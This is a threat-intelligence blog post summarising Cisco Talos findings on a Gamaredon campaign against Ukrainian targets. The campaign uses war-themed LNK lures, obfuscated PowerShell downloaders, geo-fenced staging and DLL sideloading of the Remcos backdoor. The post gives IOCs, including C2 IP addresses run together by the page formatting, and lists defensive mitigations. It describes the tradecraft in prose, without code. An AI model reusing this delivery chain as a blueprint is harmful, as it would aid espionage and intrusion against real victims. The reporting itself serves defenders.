- Vulnerable U
- Posts
- Russian Hackers Target Ukraine With Stealthy Malware Attack
Russian Hackers Target Ukraine With Stealthy Malware Attack
A Russia-backed campaign is using deceptive documents to hack Ukraine-linked targets. Here's how the malware works and what defenders should watch for.
Matt Johansen
March 31, 2025
At first glance, it looks like an ordinary Office document. The filename might mention troop movements or a Ukrainian official’s name. It’s inside a ZIP file, maybe even accompanied by a decoy doc that opens without issue. But double-click it, and you’re not opening a report, you’re triggering the next stage of a stealthy malware delivery chain.
That’s the tactic observed by Cisco Talos in a recently uncovered campaign by Gamaredon, the Russian state-linked threat group that’s been actively targeting Ukrainian entities since 2013. This time, the group is leveraging malicious Windows shortcut files (.LNK) to deliver the Remcos backdoor, a commercially available remote access tool.
Talos has been tracking the campaign since at least November 2024, and while the technical components may be familiar, the execution is anything but sloppy. From the use of war-themed lure filenames to geo-fenced payload delivery, this campaign reflects how even simple tools can be highly effective when paired with context-aware targeting and reliable infrastructure.
Familiar Themes, Updated Execution
Gamaredon has repeatedly used the invasion of Ukraine as bait in its phishing campaigns, and this one is no exception. Many of the malicious LNK files in this campaign are disguised with filenames referencing Ukrainian or Russian individuals, battlefield data, or troop activity. For example:
Original Name | Translation |
3079807576 (Шашило О.В)/ШАШИЛО Олександр Віталійович.docx.lnk | 3079807576 (Shashilo O.V)/SHASHILO Oleksandr Vitaliyovich.docx.lnk |
3151721177 (Рибак С.В)/РИБАК Станіслав Вікторович.docx.lnk | 3151721177 (Rybak S.V)/RYBAK Stanislav Viktorovich.docx.lnk |
3407607951 (Жолоб В.В)/ЖОЛОБ Владислав Вікторович.docx.lnk | 3407607951 (Zholob V.V)/ZHOLOB Vladislav Viktorovich.docx.lnk |
3710407173 (Гур'єв П.А)/ГУР'ЄВ Павло Андрійович.docx.lnk | 3710407173 (Gur'ev P.A)/GUR'EV Pavlo Andriyovich.docx.lnk |
Вероятное расположение узлов связи, установок РЭБ и расчетов БПЛА противника. ЮГ КРАСНОАРМЕЙСКА.docx.lnk | Probable location of communication nodes, electronic warfare installations and enemy UAV calculations. SOUTH OF THE RED ARMY.docx.lnk |
ГУР'ЄВ Павло Андрійович.docx.lnk | GUR'EV Pavlo Andriyevich.docx.lnk |
Координаты взлетов противника за 8 дней (Красноармейск).xlsx.lnk | Coordinates of enemy takeoffs for 8 days (Krasnoarmeysk).xlsx.lnk |
Позиции противника запад и юго-запад.xlsx.lnk | Positions of the enemy west and southwest.xlsx.lnk |
РИБАК Станіслав Вікторович.docx.lnk | RYBAK Stanislav Viktorovich.docx.lnk |
ШАШИЛО Олександр Віталійович.docx.lnk | SHASHILO Oleksandr Vitaliyevich.docx.lnk |
These files are typically compressed into ZIP archives to bypass email filters, with metadata showing they were created on just two known machines — a consistent pattern for Gamaredon.
Once opened, the LNK files execute PowerShell code designed to reach out to attacker-controlled infrastructure and download a ZIP file containing the next-stage payload.
This campaign continues the trend of Russian-aligned groups exploiting familiar platforms and emotional triggers. In a similar case, attackers recently targeted Signal’s messaging features to conduct espionage, abusing trust in secure communication tools.
Staging & Payload Delivery
source: Cisco Talos
The PowerShell downloader relies on obfuscated commands using Get-Command to evade string-based detection. It connects to servers located in Russia and Germany, but Cisco notes that the infrastructure is geo-fenced — returning HTTP 403 errors unless requests originate from specific Ukrainian regions. In public sandbox testing (e.g., Any.run), the files appear unavailable, yet samples confirm that downloads were still accessible from designated locations.
The second-stage ZIP file, once retrieved, contains a mix of:
A clean executable
A malicious DLL used for DLL sideloading
Decoy documents to mask infection
Gamaredon uses the clean binary to trigger the DLL, which in turn decrypts and executes Remcos — giving the attacker remote access to the compromised machine.
The use of deceptive file types and region-aware delivery mirrors tactics seen in other Russian campaigns. One recent operation abused malicious RDP files to gain access to internal networks, reinforcing how common file formats are weaponized at scale.
Infrastructure Breakdown
The campaign’s C2 and payload infrastructure is hosted across multiple providers, primarily:
GTHost (ASN 63023)
HyperHosting (ASN 60602)
Cisco Talos also noted that the threat actors used reverse DNS records with invalid but unique entries, which helped analysts uncover additional IP addresses matching the attacker’s infrastructure profile.
Some key IPs involved:
146.185.233.9680.66.79.9181.19.131.95
These IPs not only served payloads and decoys but at least one also functioned as a Remcos command-and-control (C2) server.
Tooling: Remcos, PowerShell, and Sideloading
Remcos is not new to the scene. It’s a commercial remote access tool (RAT) often abused by threat actors for command execution, screen capture, keylogging, and data exfiltration.
In this campaign, Remcos is deployed via a DLL sideloading method. The clean executable serves as a launcher, while the malicious DLL handles decryption and payload execution. Some of the clean applications used to facilitate this include:
TivoDiag.exeMp3tag.exepalemoon.exeCompil32.exe
source: Cisco Talos
These files are packaged with the LNK payloads in folders like SysDrive/ or Drvx64/ and extracted to the %TEMP% directory during execution.
The final Remcos binary is injected into explorer.exe and communicates over port 6856 with the attacker’s C2 server.
Attribution and Consistency
Cisco assesses with medium confidence that the activity is tied to Gamaredon, based on:
Reuse of LNK metadata creation machines seen in past Gamaredon campaigns
The Ukrainian targeting
Infrastructure overlaps
The group has a long history of using low-complexity but high-impact tactics, typically favoring custom tools and fast-moving phishing campaigns. The use of Remcos in this case marks a shift toward leveraging widely available tooling to reduce operational overhead while maintaining access capabilities.
Operational Insights
Gamaredon’s campaign highlights several enduring challenges in threat detection:
Shortcut abuse remains under-monitored in many environments
DLL sideloading continues to be a reliable method of evading AV
Geo-fencing payload delivery frustrates sandboxing and intel sharing
The fact that such a targeted campaign is built around commodity malware and public infrastructure speaks volumes about both attacker adaptability and defensive blind spots.
Defending Against This Campaign
Cisco has released IOCs for this campaign on GitHub, including:
IPs and domains
Sample filenames
Associated executables and DLL hashes
For defenders, mitigations should include:
Blocking known IPs and reviewing DNS logs for any related domains
Scanning for
.lnkfiles in email attachments and ZIPsAuditing
%TEMP%directories and sideloading vectorsEnforcing script execution policies for PowerShell
Using EDR to monitor for suspicious child processes from
explorer.exe
Whether it’s email-based malware or social engineering attacks, the goal is still credential access and foothold establishment. Another active campaign recently used device code phishing tactics to compromise cloud-based accounts, bypassing traditional MFA defenses.
Gamaredon’s latest wave shows that even well-worn techniques, when delivered with regional nuance and infrastructure discipline, still get results. For Ukrainian targets, and those supporting them, the threat is ever changing and we need to stay on top of these tactics.
Stay tuned to Vulnu for ongoing coverage of state-aligned threats, malware distribution tactics, and intelligence-driven defense strategies.